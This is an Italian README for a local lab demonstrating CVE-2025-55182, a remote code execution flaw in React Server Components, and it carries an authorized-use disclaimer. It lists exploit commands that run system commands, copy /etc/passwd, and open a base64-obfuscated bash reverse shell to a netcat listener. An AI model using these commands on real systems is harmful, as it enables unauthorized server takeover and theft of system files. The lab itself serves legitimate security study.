
CVE-2025-55182 React2Shell PoC lab
Un laboratorio completo per dimostrare e testare la vulnerabilità critica CVE-2025-55182 nei React Server Components.
Questo repository è destinato a:
Non utilizzare contro sistemi di cui non si è proprietari o per i quali non si ha esplicito permesso di test. L'accesso non autorizzato è illegale.
✅ Eseguire comandi arbitrari senza autenticazione
✅ Leggere file di sistema
✅ Creare e modificare file
✅ Stabilire connessioni reverse shell
✅ Ottenere il controllo completo del server
npm install --legacy-peer-deps
npm run dev
Il server si avvierà su http://localhost:3000
bash check-cve.sh
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"
# Terminal 1 - Listener
nc -lvnp 4444
# Terminal 2 - Exploit
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"
├── app/ # Applicazione Next.js vulnerabile
├── exploit/ # Exploit PoC funzionante
│ └── rce_final.py # Script exploit principale
├── check-cve.sh # Check automatico della vulnerabilità
├── package.json # Dipendenze vulnerabili
└── README.md
La vulnerabilità risiede nella logica di deserializzazione dei payload di React Server Components. L'exploit sfrutta l'inquinamento del prototipo per eseguire codice arbitrario tramite process.mainModule.require('child_process').execSync().
Questo codice è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati. Gli utenti sono responsabili di assicurarsi di avere la giusta autorizzazione prima di testare qualsiasi sistema. L'accesso non autorizzato ai sistemi informatici è illegale secondo leggi come il Computer Fraud and Abuse Act (CFAA) e legislazioni simili in altre giurisdizioni.
L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni.
Dopo aver completato questo laboratorio, capirai: